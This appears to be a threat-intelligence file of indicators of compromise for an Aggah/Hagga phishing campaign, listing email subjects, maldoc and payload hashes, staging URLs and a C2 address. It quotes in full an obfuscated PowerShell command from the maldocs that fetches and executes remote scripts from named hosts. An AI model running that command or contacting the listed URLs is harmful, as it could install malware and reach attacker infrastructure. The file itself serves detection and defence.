-
Notifications
You must be signed in to change notification settings - Fork 84
/
2021-10-27 Aggah IOCs
41 lines (30 loc) · 1.41 KB
/
2021-10-27 Aggah IOCs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
THREAT IDENTIFICATION: AGGAH / HAGGA
SUBJECTS OBSERVED
Order shipping address
REQUEST FOR QUOTE -16126
SENDERS OBSERVED
MALDOC FILE HASHES
REQUEST FOR QUOTE -16126,pdf.ppam
c336c07a6bc7c1fd729611a4fbc07876
13 (1).zip
c48aaaeb067bc33d1ec2c1ac21093b26
Which contains:
13.ppam
03bbdcead22e9329a234dc39f55f0a2b
POWERSHELL FROM MALDOCS
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_69d42a6ec0d74e3f8752710c7ad14fd9.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_86d4dc912a7d4ea2ae5d2599c31c5d1f.txt').GetResponse().GetResponseStream()).ReadToend());
AGGAH PAYLOAD STAGING URLS
https://www.bitly.com/kddjdkdkwokwdokii
https://ajsjwdijwidjwdidwj.blogspot.com/p/17.html
AGGAH PAYLOAD DOWNLOAD URLS
https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_69d42a6ec0d74e3f8752710c7ad14fd9.txt
https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_86d4dc912a7d4ea2ae5d2599c31c5d1f.txt
AGGAH PAYLOAD FILE HASHES
aggah2.exe
4425f4efa71c8709a2666d4478f382ce
aggah1.exe
ea85e3fe98d1519f2434b0f24e240c3a
AGGAH C2
http://103.125.190.248/j/p17r/mawa/e6a2101b1d3a47e18c7f.php